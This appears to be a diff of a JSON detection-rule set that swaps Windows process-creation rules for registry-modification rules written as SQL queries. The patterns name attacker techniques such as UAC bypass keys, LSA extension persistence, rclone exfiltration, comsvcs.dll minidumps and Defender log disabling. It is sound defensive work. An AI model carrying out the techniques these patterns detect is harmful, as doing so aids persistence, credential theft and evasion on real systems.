"description": "Detects the creation of a schtask via PowerSploit or Empire Default Configuration.", - "author": "Markus Neis, @Karneades", + "description": "Bypasses User Account Control using a fileless method", + "author": "frack113", "tags": [ - "attack.execution", - "attack.persistence", "attack.privilege_escalation", - "attack.s0111", - "attack.g0022", - "attack.g0060", - "car.2013-08-001", - "attack.t1053.005", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create%' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe -NonI%' ESCAPE '\\' AND CommandLine LIKE '%/TN Updater /TR%' ESCAPE '\\' AND (CommandLine LIKE '%/SC 
ONLOGON%' ESCAPE '\\' OR CommandLine LIKE '%/SC DAILY /ST%' ESCAPE '\\' OR CommandLine LIKE '%/SC ONIDLE%' ESCAPE '\\' OR CommandLine LIKE '%/SC HOURLY%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\' AND NewValue = '(Empty)')" ], - "filename": "proc_creation_win_hktl_powersploit_empire_default_schtasks.yml" + "filename": "registry_set_bypass_uac_using_delegateexecute.yml" }, { - "title": "WScript or CScript Dropper", - "id": "cea72823-df4d-4567-950c-0b579eaf0846", - "status": "test", - "description": "Detects wscript/cscript executions of scripts located in user directories", - "author": "Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community", + "title": "Blue Mockingbird - Registry", + "id": "92b0b372-a939-44ed-a11b-5136cf680e27", + "status": "experimental", + "description": "Attempts to detect system changes made by Blue Mockingbird", + "author": "Trent Liffick (@tliffick)", "tags": [ "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.t1112", + "attack.t1047" ], "falsepositives": [ - "Winzip", - "Other self-extractors" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (ParentProcessName LIKE '%\\\\winzip%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry 
value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\wercplsupport\\\\Parameters\\\\ServiceDll' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_script_dropper.yml" + "filename": "registry_set_mal_blue_mockingbird.yml" }, { - "title": "PUA - Rclone Execution", - "id": "e37db05d-d1f9-49c8-b464-cee1a4b11638", + "title": "Service Binary in Suspicious Folder", + "id": "a07f0359-4c90-4dc4-a681-8ffea40b4f47", "status": "experimental", - "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc", - "author": "Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group", + "description": "Detect the creation of a service with a service binary located in a suspicious directory", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ - "attack.exfiltration", - "attack.t1567.002" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%--config %' ESCAPE '\\' AND CommandLine LIKE '%--no-check-certificate %' ESCAPE '\\' AND CommandLine LIKE '% copy %' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\rclone.exe' ESCAPE '\\' OR Description = 'Rsync for cloud storage') AND (CommandLine LIKE '%pass%' ESCAPE '\\' OR CommandLine LIKE '%user%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%sync%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\' OR CommandLine LIKE '%lsd%' ESCAPE '\\' OR CommandLine LIKE '%remote%' ESCAPE '\\' OR CommandLine LIKE '%ls%' ESCAPE '\\' OR CommandLine LIKE '%mega%' ESCAPE '\\' OR CommandLine LIKE '%pcloud%' ESCAPE '\\' OR CommandLine LIKE '%ftp%' ESCAPE '\\' OR CommandLine LIKE '%ignore-existing%' ESCAPE '\\' OR CommandLine LIKE '%auto-confirm%' ESCAPE '\\' OR CommandLine LIKE 
'%transfers%' ESCAPE '\\' OR CommandLine LIKE '%multi-thread-streams%' ESCAPE '\\' OR CommandLine LIKE '%no-check-certificate %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Start' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\') AND NewValue IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', 'DWORD (0x00000002)')) OR (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\ADMIN$\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Temp\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\Common Files\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_rclone_execution.yml" + "filename": "registry_set_creation_service_susp_folder.yml" }, { - "title": "Execution of Powershell Script in Public Folder", - "id": "fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4", - "status": "experimental", - "description": "This rule detects execution of PowerShell scripts located in the \"C:\\Users\\Public\" folder", - "author": "Max Altgelt (Nextron Systems)", - "falsepositives": [ - "Unlikely" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%-f C:\\\\Users\\\\Public%' 
ESCAPE '\\' OR CommandLine LIKE '%-f \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-f \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fi C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fi \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-fil C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-fil \\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%-file C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \"C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%-file \\%Public\\%%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_powershell_public_folder.yml" - }, - { - "title": "Invoke-Obfuscation STDIN+ Launcher", - "id": "6c96fc76-0eb1-11eb-adc1-0242ac120002", - "status": "test", - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "title": "UAC Bypass via Sdclt", + "id": "5b872a46-3b90-45c1-8419-f675db8053aa", + "status": "experimental", + "description": "Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. 
UACMe 53)", + "author": "Omer Yampel, Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002", + "car.2019-04-001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\')) AND (CommandLine LIKE '%noexit%' ESCAPE '\\' OR (CommandLine LIKE '%input%' ESCAPE '\\' AND CommandLine LIKE '%$%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\exefile\\\\shell\\\\runas\\\\command\\\\isolatedCommand' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND NewValue REGEXP '-1[0-9]{3}\\\\Software\\\\Classes\\\\')))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_stdin.yml" + "filename": "registry_set_uac_bypass_sdclt.yml" }, { - "title": "Uncommon One Time Only Scheduled Task At 00:00", - "id": "970823b7-273b-460a-8afc-3a6811998529", + "title": "Usage of Renamed Sysinternals Tools - RegistrySet", + "id": "8023f872-3f1d-4301-a384-801889917ab4", "status": "experimental", - "description": "Detects scheduled task creation events that include suspicious actions, and is run once at 00:00", - "author": "pH-T (Nextron Systems)", + "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.resource_development", + "attack.t1588.002" + ], "falsepositives": [ - 
"Software installation" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe%' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%vbscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%once%' ESCAPE '\\' AND CommandLine LIKE '%00:00%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\PsExec%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ProcDump%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Handle%' ESCAPE '\\' OR TargetObject LIKE '%\\\\LiveKd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Process Explorer%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsLoglist%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PsPasswd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Active Directory Explorer%' ESCAPE '\\') AND TargetObject LIKE '%\\\\EulaAccepted' ESCAPE '\\') AND NOT ((NewProcessName LIKE '%\\\\PsExec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\PsExec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\psloglist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_one_time_only_midnight_task.yml" + "filename": "registry_set_renamed_sysinternals_eula_accepted.yml" }, { - "title": "7Zip Compressing Dump Files", - "id": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", + "title": "Potential Persistence Via LSA Extensions", + "id": "41f6531d-af6e-4c6e-918f-b946f2b85a36", "status": "experimental", - "description": "Detects a suspicious 7zip execution that involves a file with a \".dmp\"/\".dump\" extension, which could be a step in a process of dump file exfiltration", + "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. 
Each DLL has its InitializeLsaExtension() method called after loading.\n", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\7z.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7zr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\LsaExtensionConfig\\\\LsaSrv\\\\Extensions%' ESCAPE '\\')" ], - "filename": "proc_creation_win_7zip_exfil_dmp_files.yml" + "filename": "registry_set_persistence_lsa_extension.yml" }, { - "title": "MMC20 Lateral Movement", - "id": "f1f3bf22-deb2-418d-8cce-e1a45e46a5bd", - "status": "test", - "description": "Detects MMC20.Application Lateral Movement; specifically looks for the spawning of the parent MMC.exe with a command line of \"-Embedding\" as a child of svchost.exe", - "author": "@2xxeformyshirt (Security Risk Advisors) - rule; Teymur Kheirkhabarov (idea)", + "title": "Change the Fax Dll", + "id": "9e3357ba-09d4-4fbd-a7c5-ad6386314513", + "status": "experimental", + "description": "Detect possible persistence using Fax DLL load when service restart", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1021.003" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 
'%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\mmc.exe' ESCAPE '\\' AND CommandLine LIKE '%-Embedding%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Fax\\\\Device Providers\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImageName%' ESCAPE '\\') AND NOT (NewValue LIKE '\\%systemroot\\%\\\\system32\\\\fxst30.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mmc_mmc20_lateral_movement.yml" + "filename": "registry_set_fax_dll_persistance.yml" }, { - "title": "Suspicious Svchost Process", - "id": "01d2e2a1-5f09-44f7-9fc1-24faa7479b6d", + "title": "Potential Persistence Via MyComputer Registry Keys", + "id": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", "status": "experimental", - "description": "Detects a suspicious svchost process start", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1036.005" + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Unlikely but if you experience FPs add specific processes and locations you would like to monitor for" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NOT (((ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\Mrt.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rpcnet.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ngen.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\TiWorker.exe' ESCAPE '\\')) OR 
(ParentProcessName = '') OR (ParentProcessName = '') OR (ParentProcessName = '-')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\MyComputer%' ESCAPE '\\' AND TargetObject LIKE '%(Default)' ESCAPE '\\')" ], - "filename": "proc_creation_win_svchost_susp_parent_process.yml" + "filename": "registry_set_persistence_mycomputer.yml" }, { - "title": "Renamed ZOHO Dctask64 Execution", - "id": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", - "status": "test", - "description": "Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation", + "title": "Disabled Windows Defender Eventlog", + "id": "fcddca7c-b9c0-4ddf-98da-e1e2d18b0157", + "status": "experimental", + "description": "Detects the disabling of the Windows Defender eventlog as seen in relation to Lockbit 3.0 infections", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1055.001", - "attack.t1202", - "attack.t1218" + "attack.t1562.001" ], "falsepositives": [ - "Unknown yet" + "Other Antivirus software installations could cause Windows to disable that eventlog (unknown)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Hashes LIKE '%6834B1B94E49701D77CCB3C0895E1AFD%' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\dctask64.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Windows Defender/Operational\\\\Enabled%' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - 
"filename": "proc_creation_win_renamed_dctask64.yml" + "filename": "registry_set_disabled_microsoft_defender_eventlog.yml" }, { - "title": "HAFNIUM Exchange Exploitation Activity", - "id": "bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7", - "status": "test", - "description": "Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers", - "author": "Florian Roth (Nextron Systems)", + "title": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download", + "id": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", + "status": "experimental", + "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1546", - "attack.t1053" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%attrib%' ESCAPE '\\' AND CommandLine LIKE '% +h %' ESCAPE '\\' AND CommandLine LIKE '% +s %' ESCAPE '\\' AND CommandLine LIKE '% +r %' ESCAPE '\\' AND CommandLine LIKE '%.aspx%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\ProgramData\\\\VSPerfMon\\\\%' ESCAPE '\\' OR (CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%VSPerfMon%' ESCAPE '\\')) OR (NewProcessName LIKE '%Opera\\_browser.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\')) OR NewProcessName LIKE '%Users\\\\Public\\\\opera\\\\Opera\\_browser.exe' ESCAPE '\\' OR (CommandLine LIKE '%vssadmin list shadows%' ESCAPE '\\' AND CommandLine LIKE '%Temp\\\\\\_\\_output%' ESCAPE '\\') OR 
(NewProcessName LIKE '%\\\\makecab.exe' ESCAPE '\\' AND CommandLine LIKE '%inetpub\\\\wwwroot\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.dmp.zip%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\makecab.exe' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' OR CommandLine LIKE '%compressionmemory%' ESCAPE '\\' OR CommandLine LIKE '%.gif%' ESCAPE '\\')) OR (CommandLine LIKE '% -t7z %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Programdata\\\\pst%' ESCAPE '\\' AND CommandLine LIKE '%\\\\it.zip%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\comsvcs.dll%' ESCAPE '\\' AND CommandLine LIKE '%Minidump%' ESCAPE '\\' AND CommandLine LIKE '%full %' ESCAPE '\\' AND CommandLine LIKE '%\\\\inetpub\\\\wwwroot%' ESCAPE '\\') OR (CommandLine LIKE '%Windows\\\\Temp\\\\xx.bat%' ESCAPE '\\' OR CommandLine LIKE '%Windows\\\\WwanSvcdcs%' ESCAPE '\\' OR CommandLine LIKE '%Windows\\\\Temp\\\\cw.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\OneDrive\\\\UpdateOfficeConfig\\\\UpdateRingSettingURLFromOC%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_hafnium.yml" + "filename": "registry_set_lolbin_onedrivestandaloneupdater.yml" }, { - "title": "Suspicious JavaScript Execution Via Mshta.EXE", - "id": "67f113fa-e23d-4271-befa-30113b3e08b1", - "status": "test", - "description": "Detects execution of javascript code using \"mshta.exe\".", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Potential Persistence Via App Paths Default Property", + "id": "707e097c-e20f-4f67-8807-1f72ff4500d6", + "status": "experimental", + "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. 
Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.005" + "attack.persistence", + "attack.t1546.012" ], "falsepositives": [ - "Unknown" + "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND CommandLine LIKE '%javascript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\App Paths%' ESCAPE '\\' AND (TargetObject LIKE '%(Default)' ESCAPE '\\' OR TargetObject LIKE '%Path' ESCAPE '\\') AND (NewValue LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\%temp\\%%' ESCAPE '\\' OR NewValue LIKE '%\\%tmp\\%%' ESCAPE '\\' OR NewValue LIKE '%iex%' ESCAPE '\\' OR NewValue LIKE '%Invoke-%' ESCAPE '\\' OR NewValue LIKE '%rundll32%' ESCAPE '\\' OR NewValue LIKE '%regsvr32%' ESCAPE '\\' OR NewValue LIKE '%mshta%' ESCAPE '\\' OR NewValue LIKE '%cscript%' ESCAPE '\\' OR NewValue LIKE '%wscript%' ESCAPE '\\' OR NewValue LIKE '%.bat%' ESCAPE '\\' OR NewValue LIKE '%.hta%' ESCAPE '\\' OR NewValue LIKE '%.dll%' 
ESCAPE '\\' OR NewValue LIKE '%.ps1%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mshta_javascript.yml" + "filename": "registry_set_persistence_app_paths.yml" }, { - "title": "Malicious Named Pipe", - "id": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", - "status": "test", - "description": "Detects the creation of a named pipe used by known APT malware", - "author": "Florian Roth (Nextron Systems), blueteam0ps, elhoim", + "title": "Potential AutoLogger Sessions Tampering", + "id": "f37b4bce-49d0-4087-9f5b-58bffda77316", + "status": "experimental", + "description": "Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (PipeName LIKE '\\\\isapi\\_http' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg' ESCAPE '\\' OR PipeName LIKE '\\\\isapi\\_dg2' ESCAPE '\\' OR PipeName LIKE '\\\\sdlrpc' ESCAPE '\\' OR PipeName LIKE '\\\\ahexec' ESCAPE '\\' OR PipeName LIKE '\\\\winsession' ESCAPE '\\' OR PipeName LIKE '\\\\lsassw' ESCAPE '\\' OR PipeName LIKE '\\\\46a676ab7f179e511e30dd2dc41bd388' ESCAPE '\\' OR PipeName LIKE '\\\\9f81f59bc58452127884ce513865ed20' ESCAPE '\\' OR PipeName LIKE '\\\\e710f28d59aa529d6792ca6ff0ca1b34' ESCAPE '\\' OR PipeName LIKE '\\\\rpchlp\\_3' ESCAPE '\\' OR PipeName LIKE '\\\\NamePipe\\_MoreWindows' ESCAPE '\\' OR PipeName LIKE '\\\\pcheap\\_reuse' ESCAPE '\\' OR PipeName LIKE '\\\\gruntsvc' ESCAPE '\\' OR PipeName LIKE '\\\\583da945-62af-10e8-4902-a8f205c72b2e' ESCAPE '\\' OR PipeName LIKE '\\\\bizkaz' ESCAPE '\\' OR PipeName LIKE '\\\\svcctl' ESCAPE '\\' OR PipeName LIKE '\\\\Posh%' ESCAPE '\\' OR PipeName LIKE '\\\\jaccdpqnvbrrxlaf' ESCAPE '\\' OR PipeName LIKE '\\\\csexecsvc' ESCAPE '\\' OR PipeName LIKE 
